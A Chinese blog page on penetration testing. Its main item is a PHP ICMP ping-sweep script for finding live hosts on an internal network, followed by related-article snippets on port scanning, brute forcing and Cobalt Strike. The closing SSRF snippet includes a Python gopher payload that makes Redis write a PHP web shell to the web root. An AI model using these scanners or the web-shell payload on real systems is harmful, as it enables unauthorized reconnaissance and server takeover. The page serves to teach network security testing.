PHP扫描内网存活主机

最新推荐文章于 2022-08-19 17:53:01 发布
原创 最新推荐文章于 2022-08-19 17:53:01 发布 · 2k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍如何使用PHP编写脚本来扫描内网中哪些主机是活动状态的,通过简单的代码实现网络探测。

直接上代码

<?PHP
header('Content-Type: text/html; charset=utf-8');  
error_reporting(0);  

function ping($host, $timeout = 1) {
	$package = "\x08\x00\x7d\x4b\x00\x00\x00\x00PingHost";
	$socket  = socket_create(AF_INET, SOCK_RAW, 1);
	socket_set_option($socket, SOL_SOCKET, SO_RCVTIMEO, array('sec' => $timeout, 'usec' => 0));
	socket_connect($socket, $host, null);

	$ts = microtime(true);
	socket_send($socket, $package, strLen($package), 0);
	if (socket_read($socket, 255))
		$result = microtime(true) - $ts;
	else    
		$result = false;
	socket_close($socket);
	return $result;
}
function get_ip_pre($ip){  
	$num = explode('.',$ip);  
	return $num[0].".".$num[1].".".$num[2].".";  
} 	
$startip = $argv[1];
$endip = $argv[2];
$ippre = get_ip_pre($startip);
$startnum = array_pop(explode(".",$startip));
$endnum = array_pop(explode(".",$endip));
	
for($i=$startnum; $i<=$endnum; $i++){
	$ip = $ippre."$i";
	$res = ping($ip,2);
	if($res)
		echo "$ip is onlink\n";
	else 
		echo "$ip sense shutdown\n";
	$ip = $ippre;
	ob_flush();  
	flush();
}
?>


内网安全-信息收集-内网资源探测-扫描内网存活主机
cc123489ll的博客
05-01 1606
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。接下来我将给大家安排一个为期1个月的网络安全初级计划,当你学完后,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web渗透、安全服务、安全分析等岗位;其中,如果你等保模块学的好,还可以从事等保工程师。Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,没必要看完。
域学习:内网探测存活主机端口、定位域管理工具、判断内网连通性:
E1even的博客
08-01 1942
ICMP协议探测: 平时经常用PING去探测一个主机是否能被探测到或者用于判断机器是否可以出网。这里做个笔记更好了解一下PING和IMCP协议 ICMP出现的原因: 在IP通信中,经常有数据包到达不了对方的情况。原因是,在通信途中的某处的一个路由器由于不能处理所有的数据包,就将数据包一个一个丢弃了。或者,虽然到达了对方,但是由于搞错了端口号,服务器软件可能不能接受它。这时,在错误发生的现场,为了联络而飞过来的信鸽就是ICMP 报文。在IP 网络上,由于数据包被丢弃等原因,为了控制将必要的信息传递给发信方。I
写个php来扫内网端口,PHP内网端口扫描脚本
weixin_42124743的博客
04-14 562
#Class B PHP port scanner by anthrax @ insight-labs.orgsession_start();set_time_limit(0);ob_implicit_flush(True);ob_end_flush();function check_port($ip,$port,$timeout=0.1) {$conn = @fsockopen($ip, $po...
hostscan:用于网络扫描php工具
06-07
主机扫描 0.2 Hostscan 是一个 php 工具,它允许您扫描特定范围的主机,主要用于信息收集和弱密码测试。 我想这是一个渗透测试工具,我创建它是为了自动化一些我经常做的测试。 由于它是 PHP,与客户端软件相比,它的工作速度相当慢。 这个怎么运作? 您需要提供 IP 范围(例如 127.0.0.1 - 127.0.0.10); 程序将根据选择的选项分别对每个地址执行操作,然后打印出响应。 默认情况下,程序将只检查开放端口、打印 http 响应头、测试 HTTP 方法并检查 FTP 以进行匿名登录。 如果选中“SSH/IMAP/DB”,程序将尝试使用在脚本开头定义的密码和用户数组对 SSH、IMAP、MySQL、PostgreSQL 和 MsSQL 进行暴力破解。 请注意,尽管您可以编辑它,但它会尝试以具有大权限(例如 root、postgres)的用户身份登录。 如果
渗透测试神器合集
m0_49936858的博客
08-19 1665
xray 1.9.1 - 漏洞捕获神器、Acunetix 14.9.220713150 - 扫描器领军者、fscan 1.9 - 内网重型武器、Kscan 1.8 - 资产测绘工具。
php判断ip是否在内网,shell检测内网ip是否存活
weixin_35826751的博客
03-22 351
有时候自己在家里想找个ip给虚拟机做测试,但又不记得那些ip是在使用的,那些没有使用的(不要说你都记得,好吧,我承认我老了),所以写了个shell脚本来检测,方便自己使用.脚本内容:cat check-ping.sh#!/bin/bash# By rocdk890# https://blog.slogra.com#Check the network is onlineread -p "Enter ...
php扫马、内网查mysql数据库账号密码(内网webshell渗透)
南三方---网站设计开发录
12-13 876
∷ Scanwebshell
基于ICMP发现内网存活主机
聚鼎安全
03-18 2847
ICMP简介: 它是TCP/IP协议族的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用等网络本身的消息。这些控制消息虽然并不传输用户数据,但是对于用户数据的传递起着重要的作用。 nmap扫描: nmap -sn -PE -T4 192.168.0.0/24(扫描一个C段下的存活主机) 24的意思是子网遮罩是24位. 也就是...
精选资源
LadonGo:Ladon Pentest扫描仪框架全平台LadonGo开源内网渗透扫描器框架,使用它可以轻松地一键批量检测C段,B段,A段存活主机,高危漏洞检测MS17010,SmbGhost,远程执行SSHWinrm,密码爆破SMBSSHFTPMysqlMssqlOracleOracleWinrmHttpBasicRedis,行扫描服务识别PortScan指纹识别HttpBannerHttpTitleTcpBannerWeblogicOxid多网卡主机,端口扫描服务识别PortScan
03-18
LadonGo一种开源内部网渗透扫描器框架,使用它可轻松一键检测C段,B段,A段存活主机,指纹识别,端口扫描,密码爆破,远程执行,高危突破检测等。3.6版本包含28一个模块功能,高危突破检测MS17010,SmbGhost,远程...
Cobalt Strike内网渗透
qq_49694748的博客
01-05 3992
1、端口扫描portscan 2、socket4a代理 3、内网渗透-端口转发 4、内网渗透-bind反弹shell 5、密码抓取hashdump logonpasswords 6、提权elevate 7、进程管理 8、进程注入inject 9、屏幕监控desktop 10、键盘记录keylogger 实验拓扑: 端口扫描 portscan 192.168.2.0/24 1-1000对网段存活主机进行存活扫描和端口扫描,可以用于内网扫描 或者图形化界面 右...
检查主机存活状态
baimoyv的博客
12-30 905
检查主机存活状态 方法一:利用for循环将ping通就跳出循环继续,如果不跳出就会走到打印ping失败 #!/bin/bash ping_success_status() { #写一个函数,ping 一次成功则提示ping成功 if ping -c 1 $IP >/dev/null; then echo "$IP Ping is successful." ...
检测局域网内主机存活脚本
weixin_34198453的博客
11-16 754
我们在对局域网的网络情况进行维护时,经常需要收集网络中存活的IP,这时候我们可以写一个shell脚本,自动收集某一网段的IP。执行该脚本,在线IP绿色显示,离线IP红色显示;并分别写入到指定IP状态列表文件中。 [root@centos ~]# cd /usr/local/bin/ [root@centos bin]# vim alive.s...
php 扫描 局域网,WFilter插件 - 局域网扫描
weixin_34206263的博客
03-17 519
局域网扫描 v20.0(2020-09-01 17:39:07)● bug fix局域网扫描 v19.0(2018-09-11 16:02:23)● 添加线程数的选项。局域网扫描 v18.0(2016-08-25 15:21:24)● 改进了在WFilterROS下扫描不能完成的bug。局域网扫描 v17.0(2016-07-22 13:33:01)● 更新界面局域网扫描 v16.0(2016-0...
php如何扫描局域网ip,python实现扫描局域网指定网段ip的方法
weixin_36488954的博客
03-11 593
一、问题由来工作的局域网中,会接入很多设备,机器人上的网络设备就2个了,一个巨哥红外,一个海康可见光。机器人还有自身的ip。有时候机器人挂的多了,设备维修更换中,搞来搞去就不记得ip是什么,用自带的软件的确能扫出来,但是这就要开两个windows环境下的软件,耗时耗力,折腾。正好在linux,那简单,敲命令。nmap -P 192.168.1.0/24可以扫描出 192.168.1.0~192.1...
PHP检测内网服务器状态的方法!
kaindy7633的博客
08-05 469
某项目有功能需求为在OA里检测用户服务器的运行状态,服务器均为内网,不能直接通过检测IP地址来实现,因为每个内网服务器都有RemotePcAnyWhere这个服务的存在,所以使用下面的代码,实现检测此服务的状态是否正常. 这里使用了PHP里的curl函数,具体可参考手册   &lt;?php $str_url = 'http://192.168.206.129:2000'; $data ...
端口扫描php,PHP实现在线端口扫描
weixin_27943395的博客
03-09 1029
PHP4/5/7版本中提供了fsockopen方法,该方法用于打开一个网络连接或者一个Unix套接字连接,也可以用来进行开放端口扫描。下面是PHP官方对于fsockopen方法的说明:使用fsockopen()方法我们可以设计以下思路来实现开放端口检测:1.获取目标IP地址以及待扫描的端口列表。2.使用For循环遍历带扫描的端口数组,讲目标IP地址与端口进行拼接。3.使用fsockopen()函数...
在线php网站扫描,一个简单的php在线端口扫描
weixin_42552410的博客
03-11 670
前言PHP是一种功能强大的Web开发语言。开发效率高,语法简单,为动态网站量身定做,加强面向对象(向C++靠拢,与JAVA搭了点边),可惜单线程(这是至命弱点,据说PHP是用C\C++编写的。),也能用C、C++、JAVA开发中间层,调用COM,服务器维护难度小,故障少。既然是为动态网站量身定做,所以注定不能开发出X-scan这样的超强扫描器,不过如果要实现一些简单的功能,还是绰绰有余的。端口扫描...
ssrf如何知道目标主机的ip
最新发布
07-09
### SSRF漏洞利用与探测目标服务器内网IP地址的方法 SSRF(Server-Side Request Forgery,服务器端请求伪造)是一种安全漏洞,攻击者通过诱导服务器发起特定的网络请求来访问受限的内部资源。在实际攻击场景中,攻击者可以通过SSRF漏洞探测目标主机的IP地址,尤其是内网IP地址,从而进一步实施横向渗透。 #### 探测目标主机IP地址的常见方法 1. **基于DNS解析的探测方式** 攻击者可以构造一个指向外部可控域名的请求,例如`http://attacker.com`,然后观察是否能够触发DNS查询日志。如果服务端存在SSRF漏洞并尝试访问该URL,则会进行DNS解析,攻击者可以通过监控DNS请求确认目标是否成功访问了指定地址。 为了探测内网IP地址,可使用类似`http://192.168.0.1.xip.io`这样的结构,其中`xip.io`是一个公共DNS服务,它会将子域名解析为对应的IP地址,从而实现对内网IP的探测[^3]。 2. **利用本地回环地址绕过限制** 在某些防护机制下,攻击者可能无法直接访问如`127.0.0.1`等本地地址。此时可以尝试使用IPv6格式或特殊表示法绕过检测逻辑,例如: ``` http://[::1]/internal http://0.0.0.0./internal http://[0:0:0:0:0:ffff:127.0.0.1]/internal ``` 这些形式可能会绕过部分黑名单校验机制,并成功访问本地服务。 3. **结合协议差异进行探测** 如果目标系统支持`file://`、`gopher://`等协议,攻击者可以构造特殊请求访问本地文件或服务。例如,在支持`gopher`协议的情况下,可以通过发送精心构造的请求来调用本地服务接口或读取敏感信息[^2]。 4. **扫描内网存活主机** 利用SSRF漏洞,攻击者可以发起对内网IP段的扫描请求,例如依次访问`http://192.168.0.1`到`http://192.168.0.254`,根据响应状态码判断哪些主机处于运行状态。这种扫描方式通常用于识别潜在的目标服务[^1]。 5. **结合其他服务特性进行扩展攻击** 某些服务(如Redis、Memcached)使用简单的文本协议并通过换行符分隔命令。在这种情况下,攻击者可以利用SSRF注入换行符(如`%0a%0d`),构造多条命令并执行更复杂的操作。例如,Weblogic的SSRF漏洞允许攻击者通过注入换行符来攻击内网中的Redis服务器[^4]。 #### 示例:使用Gopher协议反弹Shell 假设攻击者已经发现了一个SSRF漏洞,并且目标服务器支持`gopher`协议。此时可以构造如下Payload: ```python import urllib.parse # 假设目标服务器的Redis监听在127.0.0.1:6379 payload = "*3\r\n$3\r\nSET\r\n$1\r\n1\r\n$5\r\n<?php system($_GET['cmd']);?>\r\n" payload += "*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$3\r\ndir\r\n$13\r\n/var/www/html\r\n" payload += "*4\r\n$6\r\nCONFIG\r\n$3\r\nSET\r\n$10\r\ndbfilename\r\n$9\r\nshell.php\r\n" payload += "*1\r\n$4\r\nSAVE\r\n" # 编码为URL格式 encoded_payload = urllib.parse.quote(payload).replace('%0A', '%0D%0A').replace('%0D%0A', '%0D%0A') url = f"gopher://127.0.0.1:6379/_{encoded_payload}" print(url) ``` 上述代码生成的URL可用于通过SSRF漏洞向Redis服务器发送命令,最终在目标服务器上写入一个Web Shell。 --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值